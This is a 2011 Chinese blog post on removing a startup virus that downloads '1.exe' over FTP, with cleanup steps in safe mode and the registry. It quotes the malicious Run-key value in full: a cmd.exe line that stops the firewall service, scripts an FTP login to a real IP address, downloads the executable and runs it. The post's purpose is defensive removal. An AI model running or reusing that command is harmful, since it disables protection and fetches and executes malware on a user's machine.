开机启动 ftp 下载 1.exe 病毒的解决办法

作者:vkvi 来源:千一网络(原创) 日期:2011-9-25

开机启动 ftp 下载 1.exe 病毒,这个靠杀毒软件是杀不掉的,因为属于下载式病毒,这次杀了,下次又下载。

解决办法

进安全模式,并且不要连接网络,先杀一道病毒,把已知的病毒干掉;

检查开始菜单的所有程序的启动项,有没有恶意的启动项,若有,删除之;

下面就是比较重要的了,要删除下载病毒的功能,这个在 msconfig 等启动管理程序中是看不到的:在开始菜单中运行 regedit 启动注册表,定位到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,可以看到有一个名称为 shell 的,值类似为:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.190.217.216 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&e,这就是罪魁祸首,它把一串 ftp 命令写到 cmd.txt 的文件中,并且叫 cmd.exe 来执行这个命令,删除之,再到 system32 目录下,删除 cmd.txt 这个垃圾。完成。注意,不要删除 cmd.exe,因为这是 Windows 的系统文件,除非已经被病毒文件感染或替换。

顺便曝光一下我的 cmd.txt

另外,为了安全,建议再检查下 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 这里有没有运行 shell。

你前面那位网友看了:微信浏览器的坑-坑爹的重复请求

▲▲▲嘿,欢迎转载传播本站原创文章,尽量保留来源噢。▲▲▲

文章评论
标题:必填
内容:
本站永远终止与捏造“罪名”不支付广告费的某度联盟合作。
vkvi
vkvi

作者简介: vkvi,致力于 .NET Web 开发、移动开发的技术推广,在 .NET、SQL Server、Windows Server 等方面有深入研究和丰富经验,10 年间共计撰写文章 4000 余篇。 主持金融、国土、农业、电商等多个行业项目执行, 推行“技术提升生产力、人心决定成功率”的管理理论。 联系他